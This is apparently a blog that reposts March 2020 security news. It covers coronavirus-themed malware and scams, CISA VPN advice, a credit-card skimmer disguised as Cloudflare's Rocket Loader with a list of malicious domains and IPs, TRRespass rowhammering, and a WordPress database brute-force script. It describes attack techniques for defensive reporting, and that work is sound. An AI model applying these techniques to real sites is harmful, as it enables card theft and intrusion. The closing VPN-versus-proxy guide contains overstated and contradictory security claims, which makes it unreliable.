Readers like you help support my blog. When you make a purchase using links on our site, we may earn an affiliate commission! Thank you!

Saturday, March 14, 2020

Ψεύτικοι «χάρτες εξάπλωσης του κορωνοϊού» μολύνουν υπολογιστές




13 Μαρτίου, 2020, 12:38 μμ  by Absenta Mia   Leave a Comment




Η πανδημία του κορωνοϊού, έχει πλήξει τουλάχιστον 114 χώρες μέχρι σήμερα, μολύνοντας πάνω από 128.000 άτομα και στοιχίζοντας τη ζωή σε 4700 ανθρώπους. Οι κακόβουλοι παράγοντες ωστόσο, εκμεταλλεύονται αυτή την αναταραχή, δημιουργώντας ψεύτικους χάρτες εξάπλωσης του κορωνοϊού, ώστε να μολύνουν με malware τους υπολογιστές των χρηστών.

Καθώς η ανησυχία για τον κορωνοϊό μεγαλώνει, όλο και περισσότεροι αναζητούν online χάρτες ώστε να παρακολουθούν την εξάπλωση του ιού. Ωστόσο ορισμένοι από αυτούς τους χάρτες χρησιμοποιούνται από hacker, για να μολύνουν τα συστήματα των χρηστών και να κλέψουν προσωπικές πληροφορίες.

Μην κατεβάζετε χάρτες εξάπλωσης του κορωνοϊού

Παρόλη την κατάσταση που επικρατεί, πρέπει να αποφεύγετε να κατεβάζετε χάρτες που δείχνουν την εξάπλωση του ιού στη συσκευή σας. Σύμφωνα με έρευνα της Reason Security, αυτοί οι χάρτες, συχνά περιέχουν επικίνδυνα malware όπως το AZORult.

Χρησιμοποιώντας το AZORult, οι hackers μπορούν να κλέψουν το όνομα χρήστη, τους κωδικούς πρόσβασης, τους αριθμούς πιστωτικών καρτών, το ιστορικό του προγράμματος περιήγησης και τα διαπιστευτήρια σύνδεσης στα social media. Επίσης μπορούν να αποκτήσουν πρόσβαση στους τραπεζικούς λογαριασμούς, τα πορτοφόλια cryptocurrencies, ή ακόμα και να αποκτήσουν πλήρη απομακρυσμένη πρόσβαση στη μολυσμένη συσκευή σας.

Το Reason Labs ανακάλυψε ένα τέτοιο κακόβουλο λογισμικό, που ονομάζεται “Corona Virus Map” και χρησιμοποιεί την ίδια διεπαφή με τον tracker του Johns Hopkins University, ο οποίος είναι νόμιμος. Πρόκειται για ένα μικρό αρχείο EX32 Win32 που ονομάζεται Corona-virus-Map.com.exe. με μέγεθος payload περίπου 3,26 MB.

Επί του παρόντος, το κακόβουλο λογισμικό AZORult επηρεάζει μόνο τις συσκευές Windows. Ωστόσο, οι ερευνητές πιστεύουν ότι οι hackers θα μπορούσαν να δημιουργήσουν και μία έκδοση για άλλα λειτουργικά συστήματα.

Πώς θα καταλάβετε ένα ψεύτικο χάρτη


Σε αντίθεση με τους έγκυρους χάρτες, οι μολυσμένοι συχνά παροτρύνουν του χρήστες να κατεβάσουν μία άλλη εφαρμογή στη συσκευή τους για να βλέπουν ζωντανά την εξάπλωση του ιού.

Ένας άλλος τρόπος για τον εντοπισμό αυτών των ψεύτικων ιστότοπων είναι να ελέγξετε τη διεύθυνση URL ή τις λεπτομέρειες, καθώς διαφέρουν από τα νόμιμα dashboards του κορωνοϊού.

Εάν έχετε ήδη εγκαταστήσει το “Corona Virus Map” ή οποιονδήποτε τέτοιο πλαστό χάρτη, θα πρέπει να το απεγκαταστήσετε αμέσως και να κάνετε μία σάρωση για ιούς στη συσκευή σας. Αν τώρα έχετε κατεβάσει κάποιον άλλο χάρτη, πρέπει να σαρώσετε επίσης την συσκευή σας για παν ενδεχόμενο.

Ωστόσο υπάρχουν και ορισμένοι έγκυροι χάρτες που μπορείτε να εμπιστευτείτε για να παρακολουθείτε την εξάπλωση του κορωνοϊού:

Johns Hopkins’s

Healthmap.org

US Centers for Disease Control and Prevention

WHO’s official tracker

US Govt Shares Tips on Securing VPNs Used by Remote Workers


By Sergiu Gatlan  March 13, 2020  03:34 PM  0






The Department of Homeland Security's cybersecurity agency today shared tips on how to properly secure enterprise virtual private networks (VPNs) seeing that a lot of organizations have made working from home the default for their employees in response to the Coronavirus disease (COVID-19) pandemic.

"As organizations elect to implement telework, the Cybersecurity and Infrastructure Security Agency (CISA) encourages organizations to adopt a heightened state of cybersecurity," an alert published today says.
Malicious actors expected to focus attacks on teleworkers

Since more and more employees have switched to using their org's VPNs for teleworking, threat actors will increasingly focus their attacks on VPN security flaws that will be less likely to get patched in time if work schedules will be spread around the clock.

CISA also highlights the fact that malicious actors might also increase their phishing attacks to steal the user credentials of employees working from home, with orgs that haven't yet implemented multi-factor authentication (MFA) for remote access being the most exposed.


US-CERT
✔@USCERT_gov




Is your organization teleworking because of #COVID19? Here are some https://go.usa.gov/xdMYJ key recommendations on enterprise VPN security. #CyberVigilance #Cyber Cybersecurity #Infosec
102
9:12 PM - Mar 13, 2020
Twitter Ads info and privacy
105 people are talking about this




"Organizations may have a limited number of VPN connections, after which point no other employee can telework," CISA adds.

"With decreased availability, critical business operations may suffer, including IT security personnel’s ability to perform cybersecurity tasks."
Mitigations for boosting enterprise VPN security

Among the mitigation measures recommended for organizations considering telework options for their employees because of the Coronavirus disease (COVID-19) pandemic, CISA lists:


• Keeping VPNs, network infrastructure devices, and devices used for remote work up to date (apply the latest patches and security configs).
• Notifying employees of an expected increase in phishing attempts.
• Ensuring that IT security staff are ready for remote log review, attack detection, and incident response and recovery.
• Implementing MFA on all VPN connections or required employees to use strong passwords to defend against future attacks.
• Testing VPN infrastructure limitations in preparation for mass usage and take measures such as rate-limiting to prioritize users that will require higher bandwidths.

As part of its teleworking guidance, CISA also advises organizations to review DHS documentation on how to secure network infrastructure devices, avoid social engineering and phishing attacks, choose and protect passwords and supplement passwords, as well as the National Institute of Standards and Technology (NIST) guide to enterprise telework and BYOD security

The DHS cybersecurity agency previously warned orgs to patch Pulse Secure VPN servers against ongoing attacks trying to exploit a known remote code execution (RCE) vulnerability tracked as CVE-2019-11510.

One week later, the FBI said in a flash security alert that state-backed hackers have breached the networks of a US financial entity and a US municipal government after exploiting servers left vulnerable to CVE-2019-11510 exploits.


US-CERT
✔@USCERT_gov




Unpatched Pulse Secure VPN servers remain an attractive target for malicious actors. @CISAgov released an Alert on continued exploitation of CVE-2019-11510 in Pulse Secure. Update ASAP! https://go.usa.gov/xpSzQ #Cyber #Cybersecurity #InfoSec
255
6:17 PM - Jan 10, 2020
Twitter Ads info and privacy
218 people are talking about this




CISA also published information on how to defend against scammers who use the Coronavirus Disease 2019 (COVID-19) health crisis as bait to push their scams over the Internet.

The World Health Organization (WHO) and the U.S. Federal Trade Commission (FTC) issued warnings about ongoing Coronavirus-themed phishing attacks and scam campaigns in February.

Microsoft, Google, LogMeIn, and Cisco have also announced last week that they are offering free licenses for their meeting, collaboration, and remote work tools so that teleworkers can join virtual meetings and chat with colleagues while working remotely.

Related Articles:

US Govt Shares Tips to Defend Against Coronavirus Cyber Scams

US Govt Updates Info on North Korean Malware

US Govt Alerts Financial Services of Ongoing Dridex Malware Attacks

US Govt Warns of Ransomware Attacks on Pipeline Operations

US Charges Huawei With Conspiracy to Steal Trade Secrets, Racketeering

Friday, March 13, 2020

Rocket Loader skimmer impersonates CloudFlare library in clever scheme


Rocket Loader skimmer impersonates CloudFlare library in clever scheme

Posted: March 10, 2020 by Jérôme Segura
Last updated: March 11, 2020


Update: The digital certificate issued for https[.]ps has been revoked by GlobalSign.

Fraudsters are known for using social engineering tricks to dupe their victims, often times by impersonating authority figures to instill trust.

In a recent blog post, we noted how criminals behind Magecart skimmers mimicked content delivery networks in order to hide their payload. This time, we are looking at a far more clever scheme.

This latest skimmer is disguised as a JavaScript file that appears to be CloudFlare’s Rocket Loader, a library used to improve page load time. The attackers created an almost authentic replica by registering a specially crafted domain name.

This campaign has been affecting a number of e-commerce sites and shows threat actors will continue to come up with ingenious ways to deceive security analysts and website administrators alike.
Decoy Rocket Loader

On a compromised Magento site, we noticed that attackers had injected a script purporting to be the Rocket Loader library. In fact, we can see two almost identical versions loaded side by side.

If we look at their source code, we find that the two scripts are quite different. One of them is obfuscated, while the other is recognizable as the legitimate CloudFlare Rocket Loader library.

There is a subtle difference in the URI path loading both scripts. The malicious one uses a clever way to turn the domain name http.ps (note the dot ‘.’ , extra ‘p’ and double slash ‘//’) into something that looks like ‘https://’. The threat actors are taking advantage of the fact that since Google Chrome version 76, the “https” scheme (and special-case subdomain “www”) is no longer shown to users.

To reveal the full URL with its protocol, you can double click inside the address bar. In other browsers such as Firefox or Edge, the default is to show the entire URL. That makes this attack a little more obvious and therefore less effective if you were a site administrator investigating this library.
Active skimmer campaign

The Palestinian National Internet Naming Authority (PNINA) is the official domain registry for the .ps country code Top-Level-Domain (ccTLD). The decoy domain http.ps was registered on 2020-02-07 via the Key-Systems GmbH registrar.

In mid-February, security researcher Willem de Groot tweeted about how this domain was being used for credit card skimming in an ongoing campaign with the additional “e4[.]ms” domain.

The skimmer code as well as its exfiltration gate (autocapital[.]pw), were described by Denis Sinegubko, a security researcher at GoDaddy/Sucuri.

There are two ways e-commerce sites are being compromised:
Skimming code that is injected into a self hosted JavaScript library (the jQuery library seems to be the most targeted)
A script that references an external JavaScript, hosted on a malicious site

The first version of the skimmer used in this campaign is the hex obfuscated type with data exfiltration via autocapital[.]pw as seen in the decoy Rocket Loader library. As Denis mentioned in his tweet, this skimmer contains an English and Portuguese version (urlscan.io archive here).

The other version of the skimmer (hosted on e4[.]ms) uses a different obfuscation scheme with data exfiltration via xxx-club[.]pw (this domain is on the same server as the autocapital[.]pw exfiltration gate).

We recognize this obfuscation pattern as ‘Radix’, from a previous campaign described and tracked by Sucuri since 2016. Given the naming convention used for the domains and skimmers, we believe the same threat actors may be behind this newest wave of attacks.
Patching and proactive security

This kind of attack reinforces the importance of good website security. The majority of compromises happen on sites that have not been updated or that use weak login credentials. These days, other forms of defense include web application firewalls and general hardening of the CMS and its server.

The majority of consumers that shop on a compromised site will have no idea that something went wrong until it’s too late. Even though it is the responsibility of the merchant to ensure their platform is secure, it is obvious that additional containment needs to be taken by visitors themselves.

Malwarebytes users are protected against this credit card skimming attack via our web protection layer in Malwarebytes for consumers and businesses.

We have reached out to the registrar and certificate authority but at the time of writing the malicious decoy domain is still active.
Indicators of compromise

Skimmers and gateshttp[.]ps autocapital[.]pw xxx-club[.]pw e4[.]ms y5[.]ms
83.166.248[.]67
83.166.244[.]189

Thursday, March 12, 2020

TRRespass research reveals rowhammering is alive and well

by Paul Ducklin


We’re not sure quite how dangerous this problem is likely to be in real life, but it has the most piratical name for a bug that we’ve seen in quite some time, me hearties.

TRRespass is how it’s known (rrrroll those Rs if you can!) – or plain old CVE-2020-10255 to the landlubber types amongst us.

Trespass is the legal name for the offence of going onto or into someone else’s property when you aren’t supposed to.

And TRR is short for Target Row Refresh, a high-level term used to describe a series of hardware protections that the makers of memory chips (RAM) have been using in recent years to protect against rowhammering.

So TRRespass is a series of cybersecurity tricks involving rowhammering to fiddle with data in RAM that you’re not supposed to, despite the presence of low-level protections that are supposed to keep you out.

Rowhammering is a dramatically but aptly named problem whereby RAM storage cells – usually constructed as a grid of minuscule electrical capacitors in a silicon chip – are so tiny these days that they can be influenced by their neighbours or near neighbours.

It’s a bit like writing the address on an envelope in which you’ve sealed a letter – a ghostly impression of the words in the address is impinged onto the paper inside the envelope.

With a bit of care, you might figure out a way to write on the envelope in such a way that you alter the appearance of parts of the letter inside, making it hard to read, or even permanently altering critical parts (obscuring the decimal points in a list of numbers, for example).

The difference with rowhammering, however, is that you don’t need to write onto the envelope to impinge on the letter within – just reading it over and over again is enough.

In a rowhammering attack, then, the idea is to be able to modify RAM that you aren’t supposed to access at all (so you are writing to it, albeit in a somewhat haphazard way), merely by reading from RAM that you are allowed to look at, which means that write-protection alone isn’t enough to prevent the attack.
One row at a time

To simplify the otherwise enormous number of individual control connections that would be needed, you can’t read just one bit at a time from most RAM chips.

Instead, the cells storing the individual bits are arranged in a series of rows that can only be read out one full row at a time.4×4 grid of memory cells representing a DRAM chip

To read cell C3 above, for example, you would tell the row-selection chip to apply power along row wire 3, which would discharge the capacitors A3, B3, C3 and D3 down column wires A, B, C and D, allowing their values to be determined. (Bits without any charge will read out as 0; bits that were storing a charge as 1.)

You’ll therefore get the value of four bits, even if you only need to know one of them.

Incidentally, reading out a row essentially wipes its value by discharging it, so immediately after any read, the row is refreshed by saving the extracted data back into it, where it’s ready to be accessed again.

Also, because the charge in any cell leaks away over time anyway, every row needs regularly refreshing whether it is used or not.

The RAM circuitry does this automatically, by default every 64 milliseconds (that’s about 16 times a second, or just under 1,000 times a minute).

That’s why this sort of memory chip is known as DRAM, short for dynamic RAM, because it won’t keep its value without regular external help.

(SRAM, or static RAM, holds its value as long as it’s connected to a power supply; Flash RAM will hold its value indefinitely, even when the power is turned off.)
Exploiting the refresh

One problem with this 64ms refresh cycle is, if a RAM row loses its charge or otherwise gets corrupted between two cycles, that the corruption won’t be noticed – the “recharge” will kick in and refresh the value using the incorrect bits.

And that’s where rowhammering comes in.

In 64ms you can trigger an enormous number of memory reads along one memory row, and this may generate enough electromagnetic interference to flip some of the stored values in the rows on either side of it.

The general rule is that the more you hammer and the longer the cell has been leaking away its charge, the more likely you are to get a bitflip event.

You can even do what’s called double-sided rowhammering, assuming you can work out what memory addresses in your program are stored in which physical regions of the chip, and hammer away by provoking lots of electrical activity on both sides of your targeted row at the same time.

Think of it as if you were listening to a lecture on your headphones: if attackers could add a heap of audio noise into your left ear, you’d find it hard to hear what the lecturer was saying, and might even misunderstand some words; if they could add interference into both ears at the same time, you’d hear even less, and misunderstand even more.
Reducing the risk

Numerous ways have emerged, in recent years, to reduce the risk of rowhammering, and to make real-world memory-bodging attacks harder to pull off.

Anti-rowhammering techniques include:
Increasing the DRAM refresh rate. The longer a bit goes unrecharged, the more likely it is to flip due to on-chip interference. But recharging the cells in a DRAM row is done by reading their bit values out redundantly, thus forcing a refresh. The time spent refreshing the entire chip is therefore a period during which regular software can’t use it, so that increasing the refresh rate reduces performance.

Preventing unprivileged software from flushing cached data. If you read the same memory location over and over again, the processor is supposed to remember recently used values in an internal area of super-fast memory called a cache. This naturally reduces the risk of rowhammering, because repeatedly reading the same memory values doesn’t actually cause the chip itself to be accessed at all. So, blocking unauthorised programs from executing the clflush CPU instruction prevents them from bypassing the cache and getting direct access to the DRAM chip.
Reducing the accuracy of some system timers. Rowhammering attacks were invented that would run inside a browser, and could therefore be launched by JavaScript served up directly from a website. But these attacks required very accurate timekeeping, so browser makers deliberately added random inaccuracies to JavaScript timing functions to thwart these tricks. The timers remained accurate enough for games and other popular browser-based apps, but not quite precise enough for rowhammering attackers.
A Target Row Refresh (TRR) system in the chip itself. TRR is a simple idea: instead of ramping up the refresh rate of memory rows for the entire chip, the hardware tries to identify rows that are being accessed excessively, and quietly performs an early refresh on any nearby rows to reduce the chance of them suffering deliberately contrived bit-flips.

In other words, TRR pretty much does what the name suggests: if a DRAM memory row appears to be the target of a rowhammer attack, intervene automatically to refresh it earlier than usual.

That way, you don’t need to ramp up the DRAM refresh rate for every row, all the time, just in case a rowhammer happens to one row, some of the time.

So, the authors of the TRRespass paper set out to measure the effectiveness of the TRR mitigations in 42 different DRAM chips manufactured in the past five years.

They wanted to find out:
How different vendors actually implement TRR. (There’s no standard technique, and most of those used have not been officially documented by the chip vendor.)
How various TRR implementations might be tricked and bypassed by an attacker.
How effective rowhammering attacks might be these days, even with TRR in many chips.

We’ll leave you to work through the details of the report, if you wish to do so, though be warned that it’s quite heavy going – there’s a lot of jargon, some of which doesn’t get explained for quite a while, and the content and point-making is rather repetitive (perhaps a side-effect of having eight authors from three different organisations).

Nevertheless, the researchers found that they were able to provoke unauthorised and probably exploitable memory modifications on 13 of the 42 chips they tested, despite the presence of hardware-based TRR protections.

Fortunately, they didn’t find any common form of attack that worked against every vendor’s chip – each vulnerable chip typically needed a different pattern of memory accesses unleashed at a different rate.

Even though you can’t change the memory chips in your servers or laptops every few days, this suggests that any successful attack would require the crooks to get in and carry out a fair bit of “hardware reconnaissance and research” on your network first…

…in which case, they probably don’t need to use rowhammering, because they’ve already got a dangerous foothold in your network already.

It also suggests that, in the event of attacks being seen in the wild, changes to various hardware settings in your own systems (admittedly with a possible drop in performance) might be an effective way to frustrate the crooks.
What to do?

Fortunately, rowhammering doesn’t seem to have become a practical problem in real-life attacks, even though it’s widely known and has been extensively researched.

So there’s no need to stop using your existing laptops, servers and mobile phones until memory manufacturers solve the problem entirely.

But at least part of the issue is down to the race to squeeze more and more performance out of the hardware we’ve already got, because faster processors mean we can hammer memory rows more rapidly than ever, while higher-capacity RAM modules gives us more rows to hammer at any time.

As we said last time we reported on rowhammering:


[Whenever] you add features and performance – whether that’s [ramping up memory and processing power], building GPUs into mobile phone chips, or adding fancy graphics programming libraries into browsers – you run the risk of reducing security at the same time.

If that happens, IT’S OK TO BACK OFF A BIT, deliberately reducing performance to raise security back to acceptable levels.

Sometimes, if we may reduce our advice to just seven words, it’s OK to step off the treadmill.

Diagram of DRAM cells reworked from Wikimedia under CC BY-SA-3.0.

Avast disables JavaScript engine in its antivirus following major bug

WordPress Database Brute Force and Backdoors

WordPress Database Bruteforce

We regularly talk about brute force attacks on WordPress sites and explain why WordPress credentials should always be unique, complex, and hard to guess.

However, the WordPress login is not the only point of entry that hackers use to break into sites. Since the WordPress CMS stores most of its settings in a database, attackers can get access directly to the database to modify functionality and inject malicious code.
Brute Force Attacks on WordPress Databases

Databases are another potential target for brute force attacks. Hosting providers usually prevent access from external networks to their own database servers to minimize the risks of unwanted connections. That being said, usually hundreds — or even thousands — of websites connect to the same database server, so hackers just need to compromise a single site to start a database brute force attack from an internal IP.

For example, one database brute force script we recently found (base.php) loads multiple database credentials from .txt files.
DB_NAME 
DB_USER 
DB_PASSWORD 
DB_HOST 
table_prefix


The script then tries to use these credentials to connect to the database. If a connection is established, they try to obtain the siteurl option from the WordPress wp_options table, which helps the attacker identify which site the matched credentials belong to.



Interesting note: This script prints “owi6ka” if it can’t query the siteurl from the database. This word uses Latin gomoglyths to represent the Russian word “ошибка” (error).
Feasibility of Database Brute Force Attacks

Of course, this approach to brute forcing database credentials may seem significantly more difficult since the attacker is required to guess five connection parameters instead of just two. It’s worth noting that most reputable hosting providers implement proper configuration and assign randomized database names, which mitigates the risk of this type of attack. However, when hosting providers don’t follow security best practices, the approach may still be worthwhile — as demonstrated below.

For example, if you compromise one site on a shared server, you get the host name of the database that is shared by many other sites. Lots of sites use the default “wp_” table prefix. This leaves us with three more parameters to guess.

If the hosting provider has a known pattern of naming databases and database users, then the patterns can be used to generate credentials to probe. All of these prerequisites significantly reduce the difficulty level of guessing database credentials. And given that the attack can’t be blocked by plugins or HTTP-level firewalls and comes from an internal network, this attack approach can try lots of combinations without much interference.

Of course, this is only possible if the database server firewall is not configured to block excessive failed logins — and setting this up can be tricky, since you can’t block an internal IP address that is shared by hundreds of other client sites that rely on the database every second.
Alternative Use Scenarios

This malicious brute force script can be also used in the following scenarios:

If a server’s accounts are not properly isolated and the attacker is able to obtain access to even a single website, it becomes possible to obtain read access to wp-config.php files from other sites and accounts on the same shared server. Credentials from these files can be used by this script to connect to the databases of neighboring sites and find out their addresses.

Another scenario arises when hackers break into a site and want to maintain access to it. The main way to accomplish this is to plant various backdoor scripts and create rogue admin users. However, both of these solutions can be detected and removed during a site cleanup. On the other hand, if hackers successfully guess or steal the credentials of a legitimate admin user, they can also reuse them indefinitely. That’s why we strongly encourage website owners to change all of their passwords after every site compromise.

While many site owners change CMS passwords, however, very few of them ever change their database passwords. So, if hackers steal the database credentials, they leave no traces on the compromised site but still can access it (usually from other compromised sites on the same shared environment).

This script we discovered could easily help them manage the list of the stolen credentials and verify which of them are still valid.
Conclusion

While database brute force attacks are not seen often in the wild, there is definitely some interest in alternative attack vectors.

Ensuring that hosts properly configure their shared server environments may significantly mitigate risks to client websites. User accounts should be completely isolated so that CMS configuration files cannot be read by neighbors. Hosts should assign hard to guess database names and database user names. When installing WordPress, webmasters should also be creative when choosing prefix for WordPress database.

When a CMS website has been compromised, you can bet that hackers aren’t just planting backdoors and malicious code on the site. There’s a less-obvious aspect to a compromise that some users may not consider: attackers will also be on the lookout for password and database credentials found in CMS configuration files, such as wp-config — and it’s virtually impossible to detect if an attacker has gathered these at any stage of the infection.

If a compromise occurs, you should be vigilant in updating passwords across your entire environment — including the database. If you don’t change the database credentials after cleanup, hackers may still have access and be able to modify your site via compromised neighbor accounts on the same host, which is not that uncommon in shared hosting environments.

Site owners can refer to our website security guide on best practices and other ways to mitigate risk. If you believe your WordPress website or database has been hacked, we can help clean up the website infection and secure your environment from future compromise.

Tuesday, March 10, 2020

Battling online coronavirus scams with facts





SOCIAL ENGINEERING
Battling online coronavirus scams with facts

Posted: February 10, 2020 by David Ruiz
Last updated: March 5, 2020


UPDATE 03/05/2020: Yesterday, our malware intelligence researchers found a clever ploy to hide a credential and payment card skimmer behind a website that purported to show updated coronavirus cases on a global map.

Malwarebytes detected the malware which carried the ominous and maybe-too-obvious name “corona.exe.” Upon further analysis, we learned that this malware was actually just a variant of AzorUlt, a family of spyware that steals information and sometimes downloads additional malware. Though we initially named the threat “Trojan.Corona,” we have now updated the name to “Spyware.AzorUlt.”

Unlike similar coronavirus scams we discovered last month, this threat does not rely on an email campaign.

Original story below.

Panic and confusion about the recent coronavirus outbreak spurred threat actors to launch several malware campaigns across the world, relying on a tried-and-true method to infect people’s machines: fear.

Cybercriminals targeted users in Japan with an Emotet campaign that included malicious Word documents that allegedly contained information about coronavirus prevention. Malware embedded into PDFs, MP4s, and Docx files circulated online, bearing titles that alluded to protection tips. Phishing emails that allegedly came from the US Centers for Disease Control and Prevention (CDC) were spotted, too. Malwarebytes also found a novel scam purporting to direct users to a donation page to help support government and medical research.

All of these threats rely on the same dangerous intersection of misinformation and panic—a classic and grotesque cybercrime tactic. A great defense to these is, quite simply, the truth.

At Malwarebytes, we understand that safeguarding you from cyberthreats goes beyond technological protection. It also means giving you the information you need to make smart, safe decisions. Because of this, we’re presenting verified resources and data about coronavirus that will hopefully steer users away from online threats. If you see a sketchy-looking email mentioning the virus (like the one we found below), don’t open it. Instead, come here. If you want to immediately see what these online scams look like, scroll below.
What is coronavirus?

According to the World Health Organization, the current coronavirus that has infected thousands of people across the world is a single variant of a broader family of viruses, also called “coronavirus.” This particular strain of coronavirus was first identified in the city of Wuhan in central China’s Hubei province. It has the title “2019-nCoV.” Though 2019-nCoV is from the same family of coronaviruses as SARS—which spread to 26 countries between 2002 and 2003—it is not the same virus.

As of February 7, coronavirus has spread to at least 25 countries, including Australia, Vietnam, the United States, the Philippines, Nepal, Sweden, the United Kingdom, India, and more. Mexico has no reported cases—the only country in North America to avoid the virus, it appears. Countries in South America, including Brazil, Colombia, Venezuela, and Chile, have not reported any confirmed cases of the virus, either. While the majority of infections are reported in China, with 31,211 confirmed cases, the highest count of any other country is Singapore, with 30 cases.

Full, daily reports on the virus’ spread can be found at the World Health Organization’s resource page here: Novel Coronavirus (2019-nCoV) situation reports. The situation reports also provide information about every country with confirmed coronavirus cases, and this Al Jazeera article compiles that information up to February 6.

According to a February 6 report in The Wall Street Journal that cites scientists and medical academics in China, the recent coronavirus likely started in bats.

According to the US Center for Disease Control, coronavirus symptoms include fever, cough, and shortness of breath.
How can I protect myself from coronavirus?

Because coronavirus spreads from human-to-human contact, the best protection methods involve good hygiene. According to the WHO, individuals should:
Wash your hands frequently with soap and water or use an alcohol-based hand rub if your hands are not visibly dirty.
Maintain social distancing—maintain at least 1 meter (3 feet) distance between yourself and other people, particularly those who are coughing, sneezing and have a fever.
Avoid touching eyes, nose, and mouth.
If you have fever, cough, and difficulty breathing, seek medical care early. Tell your health care provider if you have travelled in an area in China where 2019-nCoV has been reported, or if you have been in close contact with someone with who has travelled from China and has respiratory symptoms.
If you have mild respiratory symptoms and no travel history to or within China, carefully practice basic respiratory and hand hygiene and stay home until you are recovered, if possible.

The WHO also actively dispelled some current myths about coronavirus. For instance, individuals cannot catch the virus from dogs and cats that are their pets, and vaccines against pneumonia do not protect against coronavirus.

For more information on coronavirus myths, please visit the WHO Myth Busters page here, along with the WHO Q&A page.
What else should I know about coronavirus?

Coronavirus is a serious threat, but it is not the world-ending plague that many fear. As of February 7, the virus has resulted in 637 total deaths. A February 6 notice by the Chinese media service CGTN reported more recoveries, at 1,542.

Individuals should not fear receiving packages from China, the WHO said, as the virus cannot survive long durations on physical objects like packages and letters. Similarly, individuals should not dip into unmeasured fear of all things Chinese. These fears have turned New York’s Chinatown district into a “ghost town,” said one local business owner, and have fueled multiple xenophobic and racist assumptions across the world.The WHO says it is okay to receive packages delivered from China.

Coronavirus has also received a strong global response. Air travel has been severely limited, Olympic qualifying games were relocated, workers built a hospital in about 10 days, fast food restaurants temporarily closed their locations, and China closed off entire populations—which has come with its own tragic tales of quarantine camps, isolation, and fear.

The spread of the virus is scary, yes, but people are working day and night to prevent greater exposure.
What should I know about coronavirus scams?

Coronavirus online scams are largely similar to one another. By preying on misinformation and fear, cybercriminals hope to trick unwitting individuals into opening files and documents that promise information about the virus.

However, Malwarebytes recently found an email scam that preys on people’s desire to help during a moment like this.

The scam email—titled “URGENT: Coronavirus, Can we count on your support today?”—purportedly comes from the nondescript “Department of Health.” Inside, the email asks users to donate to coronavirus prevention causes.

“We need your support , Would you consider donating 100 HKD to help us achieve our mission?” the email says near its end, before offering a disguised link that opens an application, not a website. The link itself begins with neither HTTPS or HTTP, but “HXXP.”A screenshot of an emailed coronavirus scam that preys on users’ good will.

Routine scams that allegedly include information about prevention and protection also come through emails, like this phishing scam spotted by Sophos.A screenshot of the emailed coronavirus scam that Sophos discovered.

The malicious email informs its recipient to open an attached document that includes information about “safety measures regarding the spreading of coronavirus,” which then directs users to a page that asks for their email address and password.

These scams are becoming a dime a dozen, and we don’t expect them to dwindle any time soon. In fact, threat actors in China were spotted sending malware around through email and through the Chinese social media platform WeChat. Though the exact types of malware were not reported, the Computer Virus Emergency Response Center said the malware itself could be used to steal data or remotely control victims’ devices.
Coronavirus information and data resources

If you’re afraid about the spread of coronavirus, we understand. But please, do not click any links in any sketchy emails, and do not donate to any causes you have not already vetted outside of your email client.

If you want to know up-to-the-date information about the virus, again, please visit the following resources:
The World Health Organization’s main information page on the virus
The WHO’s daily “situation reports”
The WHO’s “Mythbusters” page
The WHO’s public advice guide
The Center for Disease Control and Prevention’s main information page on the virus

Stay safe, everyone.

What is the Different Between VPN and Proxy – A Complete Guide!!!


By Balaji N - February 9, 2020 3     Cyber Security News



Both the VPN and proxy are used to facilitate the connection between the client and server by hiding it’s IP address and they are slightly different in the way it handles the data.

In the modern cyber world, we have faced a lot of concerns about our privacy, both the VPNs and proxy handle it significantly.

It is quite significant to have the knowledge of the difference between the VPN vs Proxy and the scenario where can we use and where we cannot.
What is a Proxy?

Proxy or proxy server is an intermediate node between client and internet that takes a request from Client and pass it to the various server and provide indirect network services to the client. primary purpose of the proxy is to filter the dangerous internet traffic by applying the strict rule to ensure the anonymity for the client.

It enables us to hide the client’s IP and the location from the site he visits. by connecting to one of the proxy servers, the client request is forwarded to the proxy then it processes the client request and the result will be returned to the client.

What is a VPN?

VPN or Virtual Private Network is a technology that developed to provide secure access over the internet for clients’ requests via encrypted tunnels. VPN redirects the client’s side request via the remote server which is run by VPN service providers. it helps to ensure the sensitive data remain private during the transmission over the internet from one place to another place.

VPN Shield the users browsing activity and bypassing Internet censorship. VPN software encrypts the user request even before your Internet Service Provider see it and it redirected to various VPN node and response to the client.

Proxy vs VPN Security

When it comes to security VPN stands ahead of the proxy servers, VPNs do have an encrypted tunnel to transfer the data securely, but that is not the case with Proxy.
Virtual Private Network (VPN) Security

With the VPN you will get a unique IP address and a secure tunnel established between you and the target that you are to get connected with it.

The VPN encryption tunnel supports the traffic that routed with all the Internet protocols with sophisticated privacy and security capabilities.

VPNs are well-known for security and reliability, it is easy for anyone to switch off or to on the VPN service.

By having an encrypted tunnel the VPNs secures your data from hackers even if you are connected with open WiFi hotspots.

VPN application supports for a number of platforms PlayStation, SmartTVs, OS/X, iPhone, Windows, Android, also other devices such as AppleTV, Chromecast, Roku, Xbox, and its support network devices as well.

With the AES -256 encryption and SSL certificates, there is no chance for an attacker to get into your data and even the government authorities can’t get your data. To construct tunnel it uses highly secured protocols PPTP, L2TP, SSTP, OpenVPN.

It helps in hiding the real location, and you can reach out to the blocked websites, videos, and other content in that blocked in your location securely.
Proxy Security

Proxy servers bridge the internet connection, it only masks the IP address of your computer and it will not encrypt the contents.

They use to communicate with HTTP or SOCKS protocol so there is encryption with the proxy servers, cybercriminals can sniff out the data that are traveling through a proxy server.

In some cases, even the cybercriminals advertise a proxy server to steal your identity. Also generally proxy servers are overloaded with visitors and terribly affect the connection speed.

HTTP proxies are more familiar and they are around being a long time and the Socket Secure (SOCKS5) proxies are used for connecting with torrent services, FTP and web servers. When compared to the regular proxy SOCKS5 Improved security.

SOCKS5 proxy is very good if you are to use a torrent or a P2P service, but it lacks privacy. If you do a lot of web surfing and simply want to bypass the websites blocked geographically and through firewall then proxy servers are ideal for you.
Proxy vs VPN Speed
VPN vs Proxy Speed is one of the most important concerns while accessing the internet using Proxy and VPN. When we talk about speed, the Proxy server is always faster than the VPN.
Proxy vs. VPN Cost
Multiple Cities and Subnets, minimum downtime, API Accessible Proxy list, and all proxy servers uplink speed.
aid Proxies are containing many servers that allow users to choose any servers in available countries. In this case, free proxies are limited and they give low bandwidth and slow down the access.
plan to spend anywhere from $5 a month for basic plans and the price also depends on the quality of proxies and the providers.
VPN and Proxy Usability
Proxy server Provide an additional layer of security between the endpoint and outside Traffic that mainly used to improve Corporate and Institutional Security.
VPN encrypts all the traffic flow between the internet and your device to prevent from ISP to monitoring your activities and collecting your browsing data.
Proxies are playing major role in anonymity web traffic and it adding identity protection for corporate officers, Reporters, and whistleblowers.
